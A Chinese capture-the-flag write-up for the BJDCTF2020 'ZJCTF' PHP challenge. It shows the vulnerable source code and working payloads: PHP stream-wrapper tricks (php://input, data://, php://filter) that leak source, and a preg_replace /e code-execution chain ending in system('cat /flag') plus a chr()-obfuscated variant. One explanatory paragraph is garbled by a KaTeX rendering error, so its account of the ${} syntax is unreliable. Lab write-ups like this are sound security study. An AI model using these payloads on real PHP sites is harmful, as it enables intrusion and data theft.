[BUUCTF][BJDCTF2020]ZJCTF，不过如此

不过如此"/>

[BUUCTF][BJDCTF2020]ZJCTF，不过如此

考点

代码审计

命令执行

解题

打开环境

 <?phperror_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";if(preg_match("/flag/",$file)){die("Not now!");}include($file);  //next.php}
else{highlight_file(__FILE__);
}
?>

首先注释中提示next.php，我们可以利用php伪协议获取

1. php://input

text=php://input&file=php://filter/read=convert.base64-encode/resource=next.php
POST:
I have a dream

2. data://text/plain

text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64-encode/resource=next.php

得到源码：

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;function complex($re, $str) {return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}foreach($_GET as $re => $str) {echo complex($re, $str). "\n";
}function getFlag(){@eval($_GET['cmd']);
}

审计代码，我们将通过getFlag函数传入cmd参数来进行命令执行

1 preg_replace()的/e模式存在命令执行漏洞

当preg_match函数在匹配到符号正则的字符串时，会将替换字符串当作代码来执行。

题目中已经限定了替换字符是strtolower("\\1"),而\\1相当于\1，该字符在正则匹配中代表第一个子匹配项。

例如：payload为/?.*={${phpinfo()}}

原先的语句： preg_replace('/(' . $regex . ')/ei', 'strtolower("\\1")', $value);
变成了语句： preg_replace('/(.*)/ei', 'strtolower("\\1")', {${phpinfo()}});

但是该语句并不能执行phpinfo函数

对于传入的非法的 $_GET 数组参数名，会将其转换成下划线，这就导致我们正则匹配失效，所以我们传入的变量可以为\S*

正则表达式的\S：匹配所有非空白字符；
.号：匹配除\n外的任意字符；
*号：匹配前面的字符0次或者多次
+号：匹配前面的字符1次或者多次（如果要在url里输入+号，必须要对其进行编码，+号编码为:%2b）

最后,为什么要使用 {KaTeX parse error: Expected 'EOF', got '}' at position 12: {phpinfo()}}̲** 或者 **{phpinfo()} ，才能执行 phpinfo 函数呢?这是由于在PHP中双引号包裹的字符串中可以解析变量，而单引号则不行。 p h p i n f o ( ) ∗ ∗ 中 的 ∗ ∗ p h p i n f o ( ) ∗ ∗ 会 被 当 做 变 量 先 执 行 ， 执 行 后 ， 即 变 成 ∗ ∗ {phpinfo()}** 中的 **phpinfo()** 会被当做变量先执行，执行后，即变成 ** phpinfo()∗∗中的∗∗phpinfo()∗∗会被当做变量先执行，执行后，即变成∗∗{1} (phpinfo()成功执行返回true)。

据此,我们可以构造payload

?\S*=${getFlag()}&cmd=system('cat /flag');

2 用chr拼接system的参数

?\S*=${system(chr(99).chr(97).chr(116).chr(32).chr(47).chr(102).chr(108).chr(97).chr(103))}

参考文章: